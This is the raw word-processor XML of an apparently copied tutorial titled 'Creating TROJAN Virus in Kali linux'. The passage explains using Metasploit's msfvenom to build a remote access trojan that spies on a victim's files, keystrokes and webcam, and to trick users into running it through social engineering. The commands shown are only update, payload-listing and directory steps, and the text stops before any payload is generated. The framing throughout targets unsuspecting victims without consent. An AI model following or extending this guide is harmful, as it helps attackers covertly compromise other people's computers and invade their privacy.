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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dwus9ark3wfn" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating TROJAN Virus in Kali linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Depending on the tools we use, we can have access to our victim’s files and system processes, including the ability to record keystrokes or take a screenshot through their webcam. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="180" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4dx7phj5tihp" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Update and Upgrade Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we should be periodically updating Kali Linux. If you haven’t upgraded in a while or you just booted it up, now is a good time to update.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>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Enter following command to update your kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next tipe in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:spacing w:line="36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This should update your system to the most recent version, ensuring that all the tools will work exactly as they should. Now we can begin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="180" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_22ih05rgp8pa" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Open exploit software</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15"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color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this article, we will be using the metasploit framework. Metasploit is a software that comes pre-installed on all Kali Linux machines that allows you to create custom payloads that will link back to your computer from the victim’s computer. In this case, the payload is our RAT. Using metasploit, a hacker can create a payload, save it to a file, and trick some unsuspecting user into clicking on it through social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>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b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now open the terminal and write : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will show a list of commands available to you in metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">To see available payloads, type: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>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b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will list all available payloads for you to use. As you can see, there are a lot of them. If you want to see other options, you can type in any of the other options listed on screen. You can see options like formatting, platforms, encoders (which will be discussed later in this article), encryption keys, bad characters, and many others.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="140" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_38gelr4rl5yr" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2.5: Fix any errors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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If you are getting error like Invalid option try following commands</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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Cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>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027">
      <w:pPr>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To fix this, change the current directory (file) to usr/share/metasploit-framework by typing in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /usr/share/metasploit-framework/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996"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from the root directory. If you make a mistake, you can type in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd . . </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we are in the metasploit-framework directory, type in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
